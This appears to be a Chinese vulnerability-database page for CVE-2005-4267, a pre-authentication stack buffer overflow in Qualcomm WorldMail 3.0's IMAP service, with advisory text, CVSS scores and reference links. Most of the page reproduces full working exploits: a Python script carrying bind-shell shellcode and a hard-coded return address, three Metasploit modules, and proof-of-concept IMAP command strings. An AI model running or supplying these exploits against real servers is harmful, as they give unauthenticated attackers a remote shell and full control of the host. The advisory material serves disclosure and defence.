CVE-2005-4267
CVSS7.5
发布时间 :2005-12-21 06:03:00
修订时间 :2011-03-07 00:00:00
NMCOEPS    

[原文]Stack-based buffer overflow in Qualcomm WorldMail 3.0 allows remote attackers to execute arbitrary code via a long IMAP command that ends with a "}" character, as demonstrated using long (1) LIST, (2) LSUB, (3) SEARCH TEXT, (4) STATUS INBOX, (5) AUTHENTICATE, (6) FETCH, (7) SELECT, and (8) COPY commands.


[CNNVD]Qualcomm WorldMail IMAPD远程缓冲区溢出漏洞(CNNVD-200512-511)

        Qualcomm WorldMail是一款邮件和消息服务器,支持IMAP、POP3、SMTP和web邮件功能。
        Qualcomm WorldMail IMAP Server中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。未经认证的远程攻击者可以发送以"}"字符结尾的长字符串,导致栈溢出。攻击者可以利用SEH覆盖或标准EBP或EIP覆盖获得系统权限。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4267
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4267
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-511
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/3005
(VENDOR_ADVISORY)  VUPEN  ADV-2005-3005
http://www.securityfocus.com/bid/15980
(UNKNOWN)  BID  15980
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359
(VENDOR_ADVISORY)  IDEFENSE  20051220 Qualcomm WorldMail IMAP Server String Literal Processing Overflow Vulnerability
http://securitytracker.com/id?1015391
(UNKNOWN)  SECTRACK  1015391
http://securityreason.com/securityalert/277
(UNKNOWN)  SREASON  277
http://secunia.com/advisories/17640
(VENDOR_ADVISORY)  SECUNIA  17640
http://seclists.org/lists/fulldisclosure/2005/Dec/1037.html
(VENDOR_ADVISORY)  FULLDISC  20051220 [ACSSEC-2005-11-27-0x1] Eudora Qualcomm WorldMail 3.0 IMAP4 Servi ce 6.1.19.0

- 漏洞信息

Qualcomm WorldMail IMAPD远程缓冲区溢出漏洞
高危 缓冲区溢出
2005-12-21 00:00:00 2007-01-24 00:00:00
远程  
        Qualcomm WorldMail是一款邮件和消息服务器,支持IMAP、POP3、SMTP和web邮件功能。
        Qualcomm WorldMail IMAP Server中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。未经认证的远程攻击者可以发送以"}"字符结尾的长字符串,导致栈溢出。攻击者可以利用SEH覆盖或标准EBP或EIP覆盖获得系统权限。
        

- 公告与补丁

        

- 漏洞信息 (1380)

Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit (EDBID:1380)
windows remote
2005-12-20 Verified
143 muts
[点击下载] [点击下载]
#!/usr/bin/python
###################################################################################
#
# PRE AUTHENTICATION Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.
#
# Discovered by  Tim Shelton - security-advisories@acs-inc.com
#
# Coded by mati@see-security.com
#
# Details:
# * SEH gets overwritten at 970 bytes in the LIST command.
# * No space for shellcode, so 1st stage shellcode is used to
#   jump back 768 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obesssions
#                FOR EDUCATION PURPOSES ONLY!
###################################################################################
# root@muts:/tmp# ./test.py 192.168.1.162
#
# Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.
#
# Discovered by  Tim Shelton - security-advisories@acs-inc.com
# Coded by mati@see-security.com
#
# [+] Connecting
# [+] * OK  WorldMail IMAP4 Server 6.1.19.0 ready
# [+] Look Maa - No authentication!
# [+] Sending evil buffer...
# [+] Done
#
# [+] Connect to port 4444 on victim IP - Muhahaha!
#
# root@muts:/tmp# nc -vn 192.168.1.162 4444
# (UNKNOWN) [192.168.1.162] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#############################################################################

import sys
import struct
import socket
from time import sleep

def banner():
        print "\nEudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0Overflow.\n"
        print "Discovered by  Tim Shelton - security-advisories@acs-inc.com"
        print "Coded by mati@see-security.com\n"
 
if len(sys.argv)!=3:
        banner()
        print "Usage: eudora-imap-LIST.py <ip> <port>\n"
        sys.exit(0)
        
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
sc3  ="\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
sc3 +="\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
sc3 +="\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
# Second Stage Shellcode
sc4  ="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc4 +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc4 +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc4 +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc4 +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
sc4 +="\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38"
sc4 +="\x4e\x36\x46\x32\x46\x52\x4b\x58\x45\x54\x4e\x53\x4b\x38\x4e\x37"
sc4 +="\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48"
sc4 +="\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
sc4 +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
sc4 +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
sc4 +="\x46\x4f\x4b\x33\x46\x35\x46\x52\x4a\x32\x45\x37\x45\x4e\x4b\x48"
sc4 +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x34"
sc4 +="\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x38"
sc4 +="\x49\x48\x4e\x36\x46\x32\x4e\x41\x41\x36\x43\x4c\x41\x53\x4b\x4d"
sc4 +="\x46\x56\x4b\x58\x43\x54\x42\x53\x4b\x48\x42\x34\x4e\x50\x4b\x58"
sc4 +="\x42\x37\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x46"
sc4 +="\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
sc4 +="\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x56\x47\x37\x43\x57"
sc4 +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
sc4 +="\x4e\x4f\x4b\x43\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e"
sc4 +="\x48\x36\x41\x38\x4d\x4e\x4a\x30\x44\x50\x45\x55\x4c\x36\x44\x30"
sc4 +="\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
sc4 +="\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x45\x43\x45\x43\x44"
sc4 +="\x43\x45\x43\x44\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x31"
sc4 +="\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x46\x46\x4a"
sc4 +="\x4c\x51\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x31"
sc4 +="\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
sc4 +="\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d"
sc4 +="\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x55\x4f\x4f\x48\x4d"
sc4 +="\x42\x35\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
sc4 +="\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x55"
sc4 +="\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x36\x48\x46\x4a\x36\x43\x56"
sc4 +="\x4d\x56\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c"
sc4 +="\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x38\x44\x4e\x41\x33\x42\x4c"
sc4 +="\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x34\x4e\x32"
sc4 +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
sc4 +="\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
sc4 +="\x48\x4d\x4b\x55\x47\x55\x44\x55\x41\x55\x41\x45\x41\x35\x4c\x46"
sc4 +="\x41\x30\x41\x35\x41\x45\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
sc4 +="\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
sc4 +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
sc4 +="\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
sc4 +="\x4a\x46\x42\x4f\x4c\x58\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d"
sc4 +="\x4f\x4f\x42\x4d\x5a"

# Win2k SP4 JMP EBX - 0x77E1CCF7

buffer = '\x90'*61 + sc4+ "\xeb\x06\x06\xeb" + '\xf7\xcc\xe1\x77' + '\x90'*8 + sc3 + '}'*400
banner()
try:
	s.connect((sys.argv[1],int(sys.argv[2])))
except:
	print "Can\'t connect to server!\n"
	sys.exit(0)
print "[+] Connecting"
data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Look Maa - No authentication!"
print "[+] Sending evil buffer..."
s.send('a001 LIST '+buffer+'\r\n')
s.close()
print "[+] Done\n"
print "[+] Connect to port 4444 on victim IP - Muhahaha!\n"

# milw0rm.com [2005-12-20]
		

- 漏洞信息 (16474)

Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow (EDBID:16474)
windows remote
2010-07-01 Verified
0 metasploit
N/A [点击下载]
##
# $Id: eudora_list.rb 9653 2010-07-01 23:33:07Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Imap
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server
				version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this
				particular vulnerability.

				NOTE: The service does NOT restart automatically by default. You may be limited to
				only one attempt, so choose wisely!
			},
			'Author'         => [ 'MC', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9653 $',
			'References'     =>
				[
					[ 'CVE', '2005-4267'],
					[ 'OSVDB', '22097'],
					[ 'BID', '15980'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 750,
					'BadChars' => "\x00\x0a\x0d\x20\x7b",
					'StackAdustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
					[ 'WorldMail 3 Version 6.1.19.0',   { 'Ret' => 0x600b6317 } ], # p/p/r in MLstMgr.dll v6.1.19.0
					[ 'WorldMail 3 Version 6.1.20.0',   { 'Ret' => 0x10022187 } ], # p/p/r in msremote.dll ?
					[ 'WorldMail 3 Version 6.1.22.0',   { 'Ret' => 0x10022187 } ], # p/p/r in MsRemote.dll v6.1.22.0
				],
			'DisclosureDate' => 'Dec 20 2005',
			'DefaultTarget' => 0))
	end

	def check
		targ = auto_target
		disconnect

		return Exploit::CheckCode::Vulnerable if (targ)
		return Exploit::CheckCode::Safe
	end

	def auto_target
		connect

		if (banner and banner =~ /WorldMail/ and banner =~ /IMAP4 Server (.*) ready/)
			version = $1
			ver = version.split('.')
			if (ver.length == 4)
				major = ver[0].to_i
				minor = ver[1].to_i
				rev = ver[2].to_i
				build = ver[3].to_i
				if (major == 6 and minor == 1)
					return targets[1] if (rev == 19)
					return targets[2] if (rev == 20)
					return targets[3] if (rev == 22)
				end
			end
		end

		# no target found
		nil
	end

	def exploit
		if (target_index == 0)
			mytarget = auto_target
			if mytarget
				print_status("Automatically detected \"#{mytarget.name}\" ...")
			else
				raise RuntimeError, 'Unable to automatically detect a target'
			end
		else
			mytarget = target
			connect
		end

		jmp =  "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
		jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
		jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

		sploit =  "a001 LIST " + rand_text_alphanumeric(20)
		sploit << payload.encoded
		sploit << generate_seh_record(mytarget.ret)
		sploit << make_nops(8) + jmp + rand_text_alphanumeric(40)
		sploit << "}" + "\r\n"

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83142)

Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow (PacketStormID:F83142)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,imap
windows
CVE-2005-4267
[点击下载]

This Metasploit module exploits a stack overflow in the Qualcomm WorldMail IMAP Server version 3.0 (build version 6.1.22.0). Using the PAYLOAD of windows/shell_bind_tcp allows or the most reliable results.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the Qualcomm WorldMail IMAP Server
				version 3.0 (build version 6.1.22.0). Using the PAYLOAD of windows/shell_bind_tcp
				allows or the most reliable results.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-4267'],
					[ 'OSVDB', '22097'],
					[ 'BID', '15980'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 750,
					'BadChars' => "\x00\x0a\x20\x0d\x7b", 
					'StackAdustment' => -3500,
					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'WorldMail 3 Version 6.1.20',   { 'Ret' => 0x10022187 } ], # msremote.dll
				],
			'DisclosureDate' => 'Dec 20 2005',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect
		
		if (banner and banner =~ /WorldMail 3 IMAP4 Server 6.1.22.0 ready/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		jmp =  "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
		jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
		jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

		sploit =  "a001 LIST " + rand_text_alpha_upper(20, payload_badchars) 
		sploit << payload.encoded + "\xeb\x06" + make_nops(2) + [target.ret].pack('V') 
		sploit << make_nops(8) + jmp + rand_text_alpha_upper(40, payload_badchars) 
		sploit << "}" + "\r\n"

		sock.put(sploit)
		
		handler
		disconnect
	end

end
    

- 漏洞信息 (F43817)

eudora_imap.pm.txt (PacketStormID:F43817)
2006-02-14 00:00:00
y0  metasploit.com
exploit,overflow,imap
CVE-2005-4267
[点击下载]

This Metasploit module exploits a stack overflow in the Qualcomm WorldMail IMAP Server version 3.0 (build version 6.1.22.0).

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::eudora_imap;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;

my $advanced = {
};

my $info = {
'Name' => 'Qualcomm WorldMail IMAPD Server Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000'],
'Priv' => 1,

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 143],
},

'AutoOpts' => { 'EXITFUNC' => 'process' },
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00",
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
},

'Encoder' =>
{
'Keys' => ['+alphanum'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the Qualcomm WorldMail IMAP Server 
version 3.0 (build version 6.1.22.0).
}),

'Refs' =>
[
['CVE', '2005-4267'],
['BID', '15980'],
],

'Targets' =>
[
['Windows 2000 Pro English ALL', 0x75022ac4],
],

'DefaultTarget' => 0,

'Keys' => ['imap'],

'DisclosureDate' => 'Dec 20 2005',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);

return($self);
}

sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}

$s->Send("A023 LOGOUT\r\n");
my $res = $s->Recv(-1, 20);
$s->Close();

if ($res !~ /WorldMail 3 IMAP4 Server 6\.1\.22\.0 ready/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}

$self->PrintLine("[*] Vulnerable installation detected :-)");
return $self->CheckCode('Detected');
}

sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $targetIndex = $self->GetVar('TARGET');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];

my $sock = Msf::Socket::Tcp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
);

if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}

my $resp = $sock->Recv(-1, 3);
chomp($resp);
$self->PrintLine('[*] Got Banner: ' . $resp);
my $resp = $sock->Recv(-1, 3);
if($sock->IsError) {
$self->PrintLine('Socket error: ' . $sock->GetError);
return;
}

$self->PrintLine('[*] Sending overflow...');

my $jmpback =
"\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28".
"\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d".
"\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b";

my $sploit =
"a001 LIST ". $self->MakeNops(20). $shellcode.
"\xeb\x06\x46\x92". pack('V', $target->[1]). $self->MakeNops(8).
$jmpback. $self->MakeNops(40). "}". "\r\n";

$sock->Send($sploit);

my $resp = $sock->Recv(-1, 3);
if(length($resp)) {
$self->PrintLine('[*] Got response, bad: ' . $resp);
}

$self->Handler($sock);
$sock->Close();
return;
}

1;
    

- 漏洞信息

22097
Eudora WorldMail Multiple IMAP Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public, Exploit Commercial Uncoordinated Disclosure

- 漏洞描述

A buffer overflow exists in WorldMail. The IMAP server fails to validate data passed to the LIST, LSUB, SEARCH TEXT, STATUS INBOX, AUTHENTICATE, FETCH, SELECT, and COPY commands resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-12-20 2005-11-27
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability
Boundary Condition Error 15980
Yes No
2005-12-20 12:00:00 2006-02-07 08:56:00
Tim Shelton is credited with the discovery of this vulnerability.

- 受影响的程序版本

Qualcomm Eudora WorldMail Server 3.0

- 漏洞讨论

WorldMail IMAPd service is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in finite-sized buffers.

An attacker can exploit this issue to crash the server resulting in a denial of service to legitimate users. Arbitrary code execution may also be possible; this may facilitate a compromise of the underlying system.

This issue is reported to affect IMAPd service version 6.1.19.0 of WorldMail 3.0; other versions may also be vulnerable.

- 漏洞利用


The following proof of concept examples of IMAP requests are available:
'02 LIST ""' + '}'x 5000
'03 LSUB ""' + '}'x 32762
'04 SEARCH TEXT ' + '}'x32762
'05 STATUS INBOX ' + '}'x32764
'02 AUTHENTICATE ' + '}'x32768
'02 FETCH 2:4 ' + '}'x10000
'02 SELECT ' + '}'x10000
'02 COPY 2:4 ' + '}'x32765

The following exploit code is available:

http://www.securityfocus.com/data/vulnerabilities/exploits/eudora_wmail.pl

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站